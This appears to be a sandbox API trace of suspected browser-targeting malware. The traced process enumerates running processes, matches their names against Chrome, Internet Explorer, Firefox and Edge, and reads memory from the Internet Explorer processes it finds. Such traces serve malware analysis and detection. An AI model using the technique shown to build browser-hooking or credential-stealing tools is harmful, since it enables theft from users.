	[0208.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.921] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.922] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0208.922] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0208.922] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0208.923] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x32c0
	[0208.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.923] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0208.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.924] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.924] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0208.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.925] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.925] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0208.926] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x32c4
	[0208.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.926] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0208.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.926] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.927] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0208.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.927] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.927] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0208.928] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x32c8
	[0208.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.928] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0208.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.928] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.928] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0208.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.929] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.929] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0208.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x32cc
	[0208.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.930] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0208.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.930] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.931] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0208.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.050] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.050] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0209.051] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x32d0
	[0209.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.051] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0209.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.052] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.053] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0209.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.053] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.054] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0209.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x32d4
	[0209.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.055] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0209.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.055] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.056] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0209.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.057] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.057] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0209.058] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x32d8
	[0209.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.058] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0209.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.058] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.059] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0209.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.060] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.060] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0209.061] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x32dc
	[0209.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.061] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0209.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.062] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.062] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0209.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.063] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.063] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0209.064] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x32e0
	[0209.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.064] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0209.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.064] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.064] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0209.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.065] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.065] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0209.065] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x32e4
	[0209.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.066] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0209.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.066] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.066] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0209.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.066] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.066] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0209.067] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x32e8
	[0209.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.067] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0209.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.068] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.068] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0209.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.069] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.069] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0209.069] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x32ec
	[0209.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.070] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0209.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.070] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.071] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0209.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.071] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.072] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0209.073] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x32f0
	[0209.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.073] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0209.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.073] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.074] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0209.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.074] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.074] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0209.075] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x32f4
	[0209.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.075] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0209.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.076] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.076] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0209.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.077] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.078] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0209.078] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x32f8
	[0209.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.078] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0209.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.079] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.079] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0209.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.080] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.080] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0209.081] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x32fc
	[0209.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.081] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0209.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.081] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0209.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.081] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0209.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.082] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.082] NtQueryInformationProcess (in: ProcessHandle=0x32fc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0209.082] ReadProcessMemory (in: hProcess=0x32fc, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0209.082] ReadProcessMemory (in: hProcess=0x32fc, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0209.082] ReadProcessMemory (in: hProcess=0x32fc, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0209.082] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0209.083] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0209.083] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3300
	[0209.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.083] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0209.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.084] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0209.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.084] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0209.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.084] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.084] NtQueryInformationProcess (in: ProcessHandle=0x3300, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0209.084] ReadProcessMemory (in: hProcess=0x3300, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0209.085] ReadProcessMemory (in: hProcess=0x3300, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0209.085] ReadProcessMemory (in: hProcess=0x3300, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0209.085] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0209.085] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0209.086] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x3304
	[0209.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.086] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0209.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.086] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.086] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0209.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.087] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.087] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0209.088] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3308
	[0209.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.088] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0209.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.088] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.088] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0209.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.089] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.089] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.090] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x330c
	[0209.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.090] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.090] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.091] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.091] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.091] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.092] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3310
	[0209.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.092] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.093] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.093] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.093] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.094] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0209.094] CloseHandle (hObject=0x188) returned 1
	[0209.094] Sleep (dwMilliseconds=0x64) 
	[0209.197] GetCurrentProcessId () returned 0x110
	[0209.197] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0209.202] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
